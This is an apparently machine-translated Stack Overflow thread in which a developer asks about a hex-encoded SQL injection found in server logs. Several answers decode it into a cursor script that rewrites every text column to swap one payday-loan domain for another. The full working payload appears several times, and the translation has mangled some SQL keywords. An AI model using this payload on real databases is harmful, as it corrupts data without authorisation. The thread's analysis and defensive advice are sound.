它有什么作用。?

时间:2013-03-06 10:10:59

标签: sql sql-injection

我最近在SQL Profiler的帮助下在我的应用程序中找到了SQL注入的原因:

原因说:

  

SELECT * FROM tbl_posting_job_info其中job_posting_id = 33131声明@s的varchar(8000)组@ S =铸造(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b 40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72为varchar(8000))的exec(@s)

它作为查询字符串传递。

所以有人能告诉我它的内容吗??

5 个答案:

答案 0 :(得分:2)

Exec可以执行作为字符串传递的SQL代码。因此,他们将字符串混淆为字符的十六进制代码,以使其对您的可读性降低。如果将它从十六进制转换为文本,则会给出:

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

格式化版本:

SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor

答案 1 :(得分:1)

该字符串是

的十六进制编码版本
  

设置ansi_warnings关闭DECLARE @T VARCHAR(255),@ C VARCHAR(255)DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c .COLUMN_NAME来自INFORMATION_SCHEMA.columns c,INFORMATION_SCHEMA.tables t其中c.DATA_TYPE in('nvarchar ','varchar','ntext','text')和c.CHARACTER_MAXIMUM_LENGTH> 10和t.table_name = c.table_name和t.table_type ='BASE TABLE'OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@ C WHILE (@@ FETCH_STATUS = 0)BEGIN EXEC('UPDATE ['+ @ T +'] SET ['+ @ C +'] = REPLACE(['+ @ C +'],''adampaydayloans.com'',''drewpaydayloans。 com'')其中['+ @ C +']喜欢''%adampaydayloans.com%''')FETCH NEXT FROM Table_Cursor INTO @ T,@ C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

我已使用http://home.paulschou.net/tools/xlate/对其进行解码。

Nicely formatted,SQL代码如下:

SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor

答案 2 :(得分:0)

    SELECT cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))

的产率:

set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from     
INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and 
c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE 
TABLE' 

OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', 
''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

基本上,它检查表格中是否出现字符串adampaydayloans.com,并将其替换为另一个值drewpaydayloans.com

答案 3 :(得分:0)

如果在db

中执行以下查询 
select cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))

你会得到

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

在执行查询之前,您应验证 job_posting_id 是否为数字,以便无法注入代码。

答案 4 :(得分:0)

使用此:

http://www.dolcevie.com/js/converter.html

传入的十六进制看起来变成了这个

set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
select c.TABLE_NAME,
       c.COLUMN_NAME 
from INFORMATION_SCHEMA.columns c, 
INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') 
and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name 
and t.table_type='BASE TABLE' 


OPEN Table_Cursor 
FETCH NEXT 
FROM Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN 
  EXEC(
    'UPDATE ['+@T+'] 
    SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'')
    where ['+@C+'] like ''%adampaydayloans.com%'' 
  ') 

  FETCH NEXT FROM Table_Cursor 
  INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

所以看起来有些阴暗的发薪日贷款类型正在尝试更改数据库中包含指向某些竞争对手的链接的所有varchar / text字段,以包含指向其发薪日贷款网站的链接。

相关问题
最新问题